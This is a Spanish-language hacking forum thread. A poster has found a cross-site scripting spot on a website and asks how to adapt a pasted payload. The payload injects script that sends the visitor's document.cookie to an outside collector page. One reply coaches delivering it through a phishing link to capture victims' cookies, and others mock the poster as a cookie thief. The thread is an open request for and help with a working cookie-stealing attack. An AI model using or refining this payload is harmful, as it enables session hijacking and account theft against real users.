Hola bueno encontre en una pagina una alarma ("><script>alert(54);</script>)
para ejecutarla ay q escrbirla en el username y apretar el boton send
boton enviar nombre=send
nombre del texto del user =usename
este es el codigo q ejecuto="http://www.paginabugeada.com/index.php?username=<script>window.location='http://usuarios.lycos.es/posadasuiza/cookies.php?cookie='+document.cookie;</script>&enviar=;"
Pero el tema es q ese exploit es del campo buscar y para la alarma <script>alert();</script> mi pregunta es q explot ahi para mi alarma?
Gracias

no puedo creer que te tomes tantas molestias para poner una alarma en una pagina que de nada te servira.




bueno aya tu si quieres malgastar tu tiempo

visitame y descubre cosas mejolres que hacer

Por que no aplicas,  el metodo que se explico en el xss de msn, creo que lo unco que tendras que cambiar sera esc(  , para que te llegue bien la cadena, no se, pero en teoria deberia funcionar, con rspecto si tu alerta es el search o donde sea, no tiene nada que ver, al final todo se ejecuta en el navegador y lo que vas a mandar es un Pishing No (el link)? para " " que te proporcione la cookie, tonces en teoria te va a funcionar, ahora que pete eb IE y en FF, ni idea!!

Por otro lado//



Y de ahi por que se les baneaaa XD!!, ahi nos das a entender a todos que eres el tipicoooo  SKidd! que lo unico que haces es robar cookies de hotmail


YeIk0s // Off topic, no me fucniona el IM, con respecto al OGxxx, podrias ser mas explicito, me perdi con lo del skin